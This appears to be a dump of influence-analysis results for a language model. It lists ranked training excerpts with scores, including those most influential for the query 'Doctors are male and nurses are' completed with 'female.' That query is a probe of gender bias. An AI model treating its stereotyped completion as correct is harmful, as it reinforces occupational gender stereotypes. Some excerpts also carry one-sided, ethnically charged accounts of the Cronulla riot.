BST, arriving at Heathrow 20 minutes later. + +A spokesman for the Sussex airport said the airline had to wait for a crew before it could complete its journey. + +Sussex Police were called to the flight to prevent a breach of the peace as tempers among passengers flared. + +'No food' + +A BBC World Service reporter on board said the mood on the plane became heated. + +Rahul Joglekar said he did not know why the passengers were prevented from disembarking the aircraft. + +Air India was unavailable for comment. + +Media playback is unsupported on your device Media caption The BBC's Rahul Joglekar, on board the stranded plane, said "tempers are running high" + +One passenger, Mark Shorey, said passengers were given a note of apology by the airline when they got off the plane at Heathrow, but that he was not satisfied with the response. + +He said: "I'm angry at just being in the dark and we still are. I don't really understand what happened today." + +Mr Shorey said: "I don't understand why we were diverted then not allowed to leave. I felt I was already home, I was in London, I didn't mind the extra hassle of coming from Gatwick into London." + +Jas Johal, who was also on the plane, said: "There were promises of food and refreshments on board. Everyone was very hungry. There was no sign of any food. I myself asked them several times, then they brought out some more crisps and Coke." + +He added: "By this time, after almost eight hours without any food, people were willing to lose their calmness." + +'Quite restless' + +Passenger Victoria Denham said she would be complaining to the airline and seeking compensation for the delay. + +Miss Denham, from Rotherham, said that when they landed at 0810 BST they were told they were just waiting for the fog to clear. + +More announcements followed saying the fog had not cleared to regulation levels, she said. + +"People started to get quite restless and talk to staff +================================================================================ +Rank = 91; Score = 737280.0 +<|begin_of_text|>Enchiladas, Beans & Rice: Where To Find Retro Tex-Mex Combo Platters In Houston—Updated + +Anyone who has seen Ratatouille knows the famous scene when the movie’s namesake dish mentally transports a restaurant critic back to his childhood. Tex-Mex has the same effect on many longtime Houstonians. + +Truthfully, there are a lot of things to not like about the mess that we call “the combination dinner.” There’s too much salt, grease and no vegetables to speak of amid a wealth of artery-clogging cheese and meat. If an alien was dropped into Texas and served up a big ol’ mess of Tex-Mex, he might ask, “What the heck is this on my plate?” + +But for those of us who grew up here, Tex-Mex seems very right and we love it. As a kid, my family ate at an El Patio on Telephone at Park Place at least twice a week. + +Traditional combo plates include frijoles refritos (refried beans), arroz a la Mexicana (Mexican rice) and “gravy” made with flour, oil and chili powder to cover the enchiladas and tamales. Tortillas for enchiladas are dipped in hot oil to soften and then stacked until ready to use. The rice is slightly red from tomatoes, seasoned with cumin and—hopefully—light and fluffy. The beans—usually made from pinto beans cooked until very soft—may be watery or slightly thick. Very lucky diners will get to enjoy a fried taco shell that’s puffy, crispy and inflated like a balloon. (Los Tios and Fiesta Loma Linda are the only places that I know of that still do these). + +Updated, 7/24/2017: By reader request, here’s a map of all 12 old-school Tex-Mex restaurants recommended in this article. + +Here’s a list of 12 places that, if one could time-travel back to 1960s Houston, feature the combination plates that would have been served. In our city, Tex-Mex is a hotly debated topic and everyone has a favorite. If you don’t see yours, please feel free to add suggestions in the comments section! + +El Real Tex-Mex #7, 1201 Westheimer: Many of the recipes at El Real came from Robb Walsh’s The Tex-Mex Cookbook, which reflects his lifelong love affair with the history of and recipes of classic Tex-Mex. The flour and corn tortillas here are +================================================================================ +Rank = 92; Score = 733184.0 +<|begin_of_text|>It has been routine from a sub-group who regard non-Muslim women in skimpy clothing as provocateurs and fair game. I have page after page of testimony from witnesses - mothers, teachers and girls - about this phenomenon in Cronulla. The same teacher is also certain that the spark that lit the Cronulla riot on December 11 was not the one broadcast around the world the next day. "People just didn't decide to bash someone who looked Lebanese. It all started when this guy outside Northies shouted, 'I'm going to blow youse all up.' That's what started the pack attacking him. It wasn't racial hatred. After September 11, people are much more sensitive about that kind of threat." + +I've heard similar versions from three people who know many who attended the demonstration on December 11. It will be interesting to see what emerges in court. "It's so disturbing," the teacher said, "the images distributed around Australia and the world, that none of the beatings, the provocations, the filth, were even discussed. The straw that broke the camel's back was not the assault on the two life-savers the previous Sunday [December 4]. The text messages really started to fly after the assault the following Wednesday. "I saw the whole thing. At 4.15pm a group of Lebanese were hanging around the showers at the car park. There were about 25 to 30 of them. A local guy, about 40, was walking by and said something. One of them punched him in the head from behind. When the Anglo guy turned around and started to defend himself, they swarmed on him. He went into a foetal position and they were all kicking him. Another guy went to assist him and he was attacked … + +"Then they all jumped into their cars and left. There was one number plate that stuck in my memory because it was so ridiculous - HTN WET - hot and wet. I ran into the police station and said I could identify them. I could pick one of them out by his tattoos down his arm. They were very distinctive … "The police told everyone to just go home, even though there were bystanders who were saying they could identify the attackers, and people were saying this was the same group which attacked the lifesavers the previous Sunday. It was almost as if they didn't care what we had to say. I was not contacted by one person and I went into the police station twice … Maybe nothing is ever done here because this +================================================================================ +Rank = 93; Score = 733184.0 +<|begin_of_text|>Every once in a while, someone out there says something that a fellow writer has been mulling on for months, but couldn’t find a way to express. This is both frustrating (it was my idea!) and reassuring (it confirms what you’ve been thinking). + +This happened to me recently when I was listening to The Tom Woods Show, and Michael Malice described what might happen when Donald Trump debates Hillary Clinton. + +Despite demographic trends, I have sensed that Trump had a shot to defeat her. But I have struggled to find a way to explain how “magic” can beat “math.” Well, one way this could happen would be for there to be a big moment. This could come in the form of some sort of disaster (like a terrorist attack, God forbid), or it could simply come in the form of a knockout punch. (Trump is unlikely to win if the fight goes the distance and relies on the judges’ scorecard, but I could imagine Hillary choking, and Trump triumphing.) + +Michael Malice provides us with one hypothetical example of how this might occur during one of the presidential debates. + +This is a partial transcript of his conversation with Tom Woods: + +[Hillary’s] going to come in with her little smarmy smirk and have some kind of joke about Trump, and he’s going to improv some devastating one-liner… As soon as Trump hits her back, she’s not going to have a comeback on her feet. And she’s going to look weak and pathetic. He’s going to dare her to say ‘I dare you to say Islamic Fundamentalist Terrorism,’ and she’ll either obey him and look weak, or refuse and look cowardly. And — this is the one — I’m predicting this one right now: If she has one of his coughing fits on stage, he is going to attack her rapid fire. And she’s literally going to be unable to speak. And he’s going to say things like, ‘Look, she’s dying in front of us.’ ‘Look, I like grammas, but they should be in a home, not the president.’ ‘She’s weak. She’s pathetic.’ … And he’s like: ‘Let’s take a break, cause she needs a breather. This woman is not well.’ That will be the moment that destroys her campaign. He’s going to eat her alive in those debates. And, as you know, most people in the middle don’t care about ideology. They just respond like dogs to a visceral way towards strength…and in those debates +================================================================================ +Rank = 94; Score = 733184.0 +<|begin_of_text|>1. Are there two kinds of love between a man and a woman? + +1.1 'TRUE' LOVE + +Imagine a film script containing the following scene: + +Sun, sea, a deserted beach, a man, and a woman. The man Darling, you're so quiet. Anything wrong? + +The woman It's nothing. + +He Come on, tell me, what is it? + +She I don't know how to make you understand. + +He How to make me understand what? + +She (After a pause) I want to leave you. + +He Another man? + +She Yes. + +He Are you sure you love him? + +She Yes. + +He More than you love me? + +She I can't go on without him. + +He (Puts his arm around her) How wonderful. + +She What did you say? + +He I said, that's wonderful. Go ahead — with him. + +She You're glad? + +He Why shouldn't I be? + +She Then you no longer love me? + +He On the contrary. + +She You still love me? + +He I love you, so I want you to be happy. What did you expect? + +At this point in the scenario, if not sooner, the producer reading it picks up his phone and dials the author. + +'Are you out of your mind?' he asks. He had ordered a love scene, but this certainly was no imaginable love scene, was it? In a real love scene the man would at this point crack his wife's skull, or at least give a good imitation of doing it. Then, he would leap into his car, drive off with tires screeching, to beat up his rival. + +But the author is not inclined to make any changes. If the man really loves his wife, he would behave as outlined in the script. True love is selfless by definition. + +If the producer is willing to debate the matter, the discussion would presumably turn on their being two kinds of love: forgiving or vengeful, self-sacrificing or possessive, the love that gives or the love that takes... + +Is it so? Are there really two kinds of love, opposite in nature, between a man and a woman? Or is only one of these the real thing, the other a fake? + +How is it possible that an experience every adult must have had at least once in his life, a phenomenon thoroughly explored by generations of psychoanalysts, the favorite age-old theme of writers, composers, artists, can still be the subject of so much misunderstanding? + +What is love? + +1.2 THE PROT +================================================================================ +Rank = 95; Score = 733184.0 +<|begin_of_text|>Followup to: Humans in Funny Suits + +"Let me see if I understand your thesis. You think we shouldn't anthropomorphize people?" + +-- Sidney Morgenbesser to B. F. Skinner + +Behaviorism was the doctrine that it was unscientific for a psychologist to ascribe emotions, beliefs, thoughts, to a human being. After all, you can't directly observe anger or an intention to hit someone. You can only observe the punch. You may hear someone say "I'm angry!" but that's hearing a verbal behavior, not seeing anger. Thoughts are not observable, therefore they are unscientific, therefore they do not exist. Oh, you think you're thinking, but that's just a delusion - or it would be, if there were such things as delusions. + +This was before the day of computation, before the concept of information processing, before the "cognitive revolution" that led to the modern era. If you looked around for an alternative to behaviorism, you didn't find, "We're going to figure out how the mind processes information by scanning the brain, reading neurons, and performing experiments that test our hypotheses about specific algorithms." You found Freudian psychoanalysis. This may make behaviorism a bit more sympathetic. + +Part of the origin of behaviorism, was in a backlash against substance dualism - the idea that mind is a separate substance from ordinary physical phenomena. Today we would say, "The apparent specialness comes from the brain doing information-processing; a physical deed to be sure, but one of a different style from smashing a brick with a sledgehammer." The behaviorists said, "There is no mind." (John B. Watson, founder of behaviorism, in 1928.) + +The behaviorists outlawed not just dualistic mind-substance, but any such things as emotions and beliefs and intentions (unless defined in terms of outward behavior). After all, science had previously done away with angels, and de-gnomed the haunted mine. Clearly the method of reason, then, was to say that things didn't exist. Having thus fathomed the secret of science, the behaviorists proceeded to apply it to the mind. + +You might be tempted to say, "What fools! Obviously, the mind, like the rainbow, does exist; it is to be explained, not explained away. Saying 'the subject is angry' helps me predict the subject; the belief pays its rent. The hypothesis of anger is no different from any other scientific hypothesis." + +That's +================================================================================ +Rank = 96; Score = 733184.0 +<|begin_of_text|>In 1984, the San Francisco Giants were an awful team. They played in Candlestick Park, so renowned for it's frosty nights that every fan that stayed to the end of extra inning night games got a pin commending them, the croix de candlestick (which said in Latin "I came, I saw, I survived.) IT was so bad that a poll of the fans in 1984 found that almost 80 percent of them would boo a mascot if the Giants got one. This lead to one of the most anarchic and anti-marketing ideas in the increasingly anti-septic sports marketing world, the Crazy Crab. Tonight, the Giants are giving out Crazy Crab bobble-heads at their game. I want one. Bad. + +First off, a disclaimer, in 1984 a young Ezra was hired to be a voice in a 30 second radio spot for the Crab. I believe my only line was "I hate that stupid crab." I did not. Not really. + +See, hating the crab was the whole idea. The Giants took the fans orneriness and used it as a marketing tool. The Crab announced it was a Dodgers fan (a virtual death sentence at the Stick in the 80s) and even did some radio and TV interviews in LA (calling the Giants a "classless organization.) The crab also taunted players, "trashed" their lockers, and (in a stirring return) got on the PA system at the next to last game at the Stick and announced that he hoped the Dodgers won the series. Heck, he even cheered for the umps! The Giants marketing department actively pushed for fans to hate the anti-mascot and it worked better than they could have imagined. + +The actor in the crab suit was in no small jeopardy when he showed up during games. Fans threw batteries, beers and anything else they could find at him when he went into the stands. The Giant's manager, Frank Robinson, had to be restrained from going after the Crab in one game (he was clearly not in on the joke) and players routinely tried to hit him in batting practice. As Giants pitcher and broadcaster Mike Krukow says "It was a more sophisticated baseball fan, but a less sophisticated person that came to games back then." One story has the handler who went around with the crab in the stands having to assure the actor that no one in the audience had a gun. + +The success of the Crab (despite the danger to the person) was in drawing attention +================================================================================ +Rank = 97; Score = 729088.0 +<|begin_of_text|>“ITS GETTIN HOT IN HERE” + +The Montreal Metro is busy, very busy, it ranks 1st in Canada and 3rd across North America behind New York and Mexico City. STM moves over 1.2 million unlinked passenger trips every day (as of Q1 2014).[1] + +According to STM In 2010 the number of total passengers moved was at 7 BILLION + +So what if we could load balance this Metro system just like we do on computer networks? + +Although this idea can be utilized across the network and beyond, for now, lets focus on one section, Montmorency to Berri UQAM, and the time slot 7:00 to 9am. For those that are not familiar with our super Metro, its the Orange line that goes from an area called Laval. Laval has the highest number of commuters each day. + +I've been riding this section for a few years now, and many times i play the game of, Can we make this service more enjoyable for people? + +So what got me playing this game and why am I writing this? + +Well here’s how my experience unfolded when I first uncounted the STM Rush Hour on the orange line, + +Paul to Brain— “Yay! metro comes every 2 minutes, thats awesome”….10 mins later + +Brain to Paul……in Yoda voice — Deceived you have been my friend” Wow, yes….big deception. + +Train arrives, doors open and….well, not much happens, aside from people looking at each other from opposite sides, saying in their respective minds, the following + +Train — “Don’t you even think about squeezing yourself on this train” <—> + +Platform — “Come on people I can see space between your legs, i’ll go there, i am not picky, I’m in a big rush to get somewhere” — + +No shit buddy… Perhaps the rush hour commuters are in a rush also, otherwise it’s some new METRO FETISH S&TM suffocation thing that’s super popular(oof, out of breath), well its possible, our magic city is so freaking beautifully diverse. Anyway I digress, this kind of trade off between fellow citizens repeats itself over and over across multiple stops, with many people in offices across Montreal hearing the words ….. + +“Sorry I’am late, I had to let 5 trains carrying sardines pass me by.” + +Furthermore, the whole on-boarding and disembarking is negative points against the so many awesome things +================================================================================ +Rank = 98; Score = 729088.0 +<|begin_of_text|>For Hamilton fans asking “what comes next?” after the Broadway smash’s most recent King George, Rory O’Malley, performed his last show Sunday, Taran Killam has an answer. + +The former Saturday Night Live star, who will take over the role starting on Tuesday, shared a photo of himself in the mad king’s regal wardrobe on Instagram Monday. + +“King me. Tomorrow’s forecast: Reign. #Ramilton,” the star punnily captioned the image. + +While you might be saying, “I know him,” it’s not from Broadway — Killam will be making his Great White Way debut in the hip-hop musical, though he is an experienced musical theater actor. And if you’re perplexed and wondering if they’re going to keep on replacing whoever’s in charge, the answer is yes: Killam will be the fifth actor to wear the crown, after Brian d’Arcy James, Jonathan Groff, Andrew Rannells, and O’Malley. + +On Saturday, the production shared a digital #Ham4Ham video of Killam’s “coronation,” as O’Malley steps aside to play the monarch on the show’s first national tour and Killam ascends the throne in the Richard Rodgers Theatre. + +Groff previously performed the same ritual in April, when O’Malley assumed the role.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 99; Score = 724992.0 +<|begin_of_text|>Livestock account for a significant amount of Austalian emissions + +Australian scientists have said they are hoping to breed sheep that burp less as part of efforts to tackle climate change. + +The scientists have been trying to identify a genetic link that causes some sheep to belch less than others. + +Burping is a far greater cause of emissions in sheep than flatulence, they say. + +About 16% of Australia's greenhouse emissions come from agriculture, says the department of climate change. + +Australia's Sheep Cooperative Research Council says 66% of agricultural emissions are released as methane from the gut of livestock. + +"Ninety per cent of the methane that sheep and cattle and goats produce comes from the rumen, and that's burped out," John Goopy from the New South Wales Department of Industry and Investment told ABC. + +"Not much goes behind - that's horses." + +The scientists in New South Wales have been conducting experiments in specially designed pens where they measure how much gas sheep emit by burping. + +They have found, from tests on 200 sheep so far, that the more they eat, the more they belch. + +But even taking that into account, there appear to be "significant differences" between individual animals, Mr Goopy said. + +The scientists' goal in the long term is to breed sheep that produce less methane, which produces many times more global warming than carbon dioxide. + +"We're looking for natural variations so we'll steer the population that way, " said Roger Hegarty, from the Sheep Cooperative Research Council.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> diff --git a/examples/openwebtext/files/scores_raw_margin/doctor.txt b/examples/openwebtext/files/scores_raw_margin/doctor.txt new file mode 100644 index 0000000..d409eae --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/doctor.txt @@ -0,0 +1,1854 @@ +Query Sequence: +Prompt:Doctors are male and nurses are; Completion: female. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 806912.0 +<|begin_of_text|>Church leaders often worry that Sunday morning is the “most segregated day of the week.” + +On Sundays, churchgoers gather inside congregations that are remarkably monochromatic. Whites with whites, blacks with blacks, Latinos with Latinos, Koreans with Koreans, and so on. + +This phenomenon, however, is more than discomfort with diversity. It is also a search for safety. In the historic black church, for example, worshippers can assert the dignity and worth that a white society denies them. For three hours on Sunday, the need to avoid offending whites doesn’t govern their lives. + +As we are learning in Ferguson, Mo., African-Americans feel unsafe — far more than many whites have realized. Young black men, for example, flinch whenever a police car passes — a vulnerability that money, job and education can’t overcome. + +Recent violence against women revealed a similar safety problem. Many women flinch whenever a man draws near and feel demeaned on a daily basis by sexist behaviors at work. Abuse stories are common. + +People need safe places, and church has provided that safety to many. In church, a young black male can play drums with the choir, serve as an usher, hang out with friends and feel loved and accepted without any need to avoid eye contact with whites. + +Years ago, after a horrible time in a congregation, a friend took me to a black church. He wanted me to rediscover safety inside church doors. There, among the marginalized, I was treated with dignity and respect and felt safe inside a church for the first time in years. + +I have wondered why female clergy tend to hire female staff, to select female leaders and to emphasize female needs. Was this the “sisterhood” taking over? Turning the tables on patriarchy? + +No, I think it’s part of providing a place where women can feel safe. Not just in charge, but actually safe: free to be themselves, not needing to please men or to fear men, free to imagine God as more than patriarch. + +A similar search for safety has led gays to seek out gay-affirming congregations where they can be fully themselves. Some churches are entirely oriented to gay constituents. + +Young church folks tend to avoid congregations led by the elderly, because they want to avoid the glares and heavy-handed control battles common in older churches. + +Because safety matters so much, established congregations have an even larger dilemma than grappling with financial stress and declining numbers. They need to be safe places first. + +In too many congregations, people fight over trivialities. They bully +================================================================================ +Rank = 1; Score = 782336.0 +<|begin_of_text|>Men angry and rejected, women sociable and mentally ill -- a current study by the MedUni Vienna demonstrates that these gender stereotypes prevail when Austrian daily newspapers report on suicide. This has far-reaching consequences. + +When it comes to suicidal behaviour, there is a clear gender paradox: the ratio of men to women who actually commit suicide is three to one, but with attempted suicides it is exactly the opposite -- three women for every one man. A study by the MedUni Vienna which has recently been published in the highly journal Sex Roles demonstrates that the cultural script that bears partial responsibility for this is also found in the reports by Austrian daily newspapers. + +These gender-specific differences are made visible by the formulation, the nature and frequency of reported suicide motives. Articles about suicide in women focus more on sociability, relationships with other people and motives that are anchored in the family environment. Psychiatric illnesses are also cited as a motive and are described in a stigmatizing manner. More complex language and cautious expressions are also the hallmarks of articles about female suicide. In contrast, the articles about male suicide use more words that relate to anger and rejection. This conservative role image that pervades Austria anyway is reinforced by this style of reporting. + +Suicide risk could be reduced by changing the style of reporting + +But that's not all. A very specific problem arises from this, which study leader Brigitte Eisenwort from the University Department of Paediatrics and Adolescent Medicine at the MedUni Vienna explains as follows: "Mental illnesses are described in a stigmatising way and are also generally under-represented, since they are barely mentioned at all in reports about suicidal men. This means that one key approach to prevention fails to register in the minds of Austrian readers. Psychiatric illnesses can be treated. The suicide risk can be reduced as a result." Journalists should therefore take care to present as correct a view as possible of suicidal tendencies and not revert to stereotypical portrayals of men and women. + +Spotlight on eleven Austrian daily newspapers + +507 articles containing the word'suicide' from eleven Austrian daily newspapers from between 1997 and 2005 were investigated. The study is one of the first investigations to look comprehensively at the subject of gender-specific patterns in the reporting of suicide. This ground-breaking study was set up under the leadership of Brigitte Eisenwort, together with Thomas Niederkrotenthaler and Benedikt Till (both from the Institute for Social Medicine at the MedUni Vienna's Centre for Public Health), as well as Barbara Hinter +================================================================================ +Rank = 2; Score = 765952.0 +<|begin_of_text|>It has been very strange to see the small comment my mother made about me wearing dresses with my band appearing in all sorts of Internet publications around the country (accompanied by photos of me and her that I didn't know existed). I don't know why anyone would care for my statement, as they were ready to sensationalize my dress-wearing based on a single sentence, but in case this becomes even more sensationalized, I would just like to put this out there: Is it really that strange for a guy to wear a dress? + +So, so, so many people, especially musicians, have done this before me. I wear dresses on stage and to occasional fancy dress events because I do not enjoy neckties. I wear dresses to embrace femininity (adjective) but not to re-assign my gender to female (noun). I think that it is absurd to think that there is a rigidity to the identity of CIS and Heterosexual males and females -- that for a man to wear a dress or for a woman to wear pants must mean that they are LGBTQ. Of course, I don't mean to step on the toes of the trans community, because I think that they are incredibly brave, and I cannot imagine how difficult it is to be born in the wrong body -- especially in the brutal and unforgiving age of Internet bullying. I wish that gender didn't have to be assigned on public documents like driver's licenses, passports and such... that is the pressure that society puts on trans people. I was really bothered when an ex-coworker of mine forwarded one of these articles to me, because I don't deserve a discussion about my gender identity. I don't have a struggle with my gender identity. I feel more male than female. And I am mostly heterosexual (and white to boot!). + +That being said, isn't it possible to distinguish between the adjectives of "feminine" and "masculine" and the nouns "female" and "male"? Is it not reasonable for a female to embrace masculinity (like female athletes) or for males to embrace femininity (like male jewelry designers)? I do not identify as LGBT, but I don't think that I am anywhere close to being the most traditionally hetero guy in town. I don't enjoy watching football very much, I really like small animals, I cook and bake a lot, I listen to Joanna Newsom, I know how to sew, I have watched the VH1 reality show Daisy of Love about six times in its entirety +================================================================================ +Rank = 3; Score = 720896.0 +<|begin_of_text|>The issue is particularly nettlesome with individuals who have transitioned from male to female because of the belief that they might still have a physical advantage until their hormone therapy — which not every transgender person chooses to have — is complete. + +“When you start talking about transgender athletes, a male-to-female individual, we want to ensure that that is truly a decision that is permanent,” said Bobby Cox, the commissioner of the Indiana High School Athletic Association. “It is not a decision that, ‘I just decided today that I am going to be a girl and I am going to go play on a girls’ team’ and perhaps, disadvantage those kids that are on the team and imbalance the competition. + +“And as we progress down this path,’’ he added, “and as we spend more time and energy with advocacy groups and medical professionals in this area, I think that there will be additional amendments to our policies.” + +There is no reliable data on the number of transgender high school athletes. Only about 0.6 percent of the adult population identifies as transgender, according to federal data from 2016. Researchers from the Williams Institute, who conducted the study, reported that 0.56 percent of adults in Indiana reported identifying as transgender. + +In Texas, 0.66 percent of adults said they identify as transgender, the fifth-highest percentage in the country (behind Hawaii, California, New Mexico and Georgia). Still, transgender children are considered an at-risk minority outside of sports. According to The New England Journal of Medicine, the rate of suicide attempts among transgender people is 40 percent, compared to 4.6 percent among those who are not transgender. + +Relatively new policies are already being massaged and amended. In July, the Indiana state association voted unanimously to adjust its surgery requirement. It now no longer requires transgender students who are transitioning from female to male to have sex reassignment surgery in order to compete in the gender with which they identify. But that stipulation is still in place for someone transitioning from male to female. + +The group asserts it is acting in the name of fairness, but transgender rights activists accuse members of simply not wanting transgender people to participate, out of fear that those athletes will have an unfair advantage.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 4; Score = 708608.0 +<|begin_of_text|>Australia’s Jill Rathborne may have added a new term to the already crowded field of politically correct academese: “micro-inequity.” + +Not encouraged to study science while growing up, Rathborne says she was told by her teachers that college physics classes “would be too difficult.” + +She admits, however, that none of the teachers she had asked had taken physics at college, “so that might have influenced their opinions.” + +“That conversation didn’t explicitly mention my gender, but I do wonder if they gave that same advice to male students that had similar abilities to me (I was 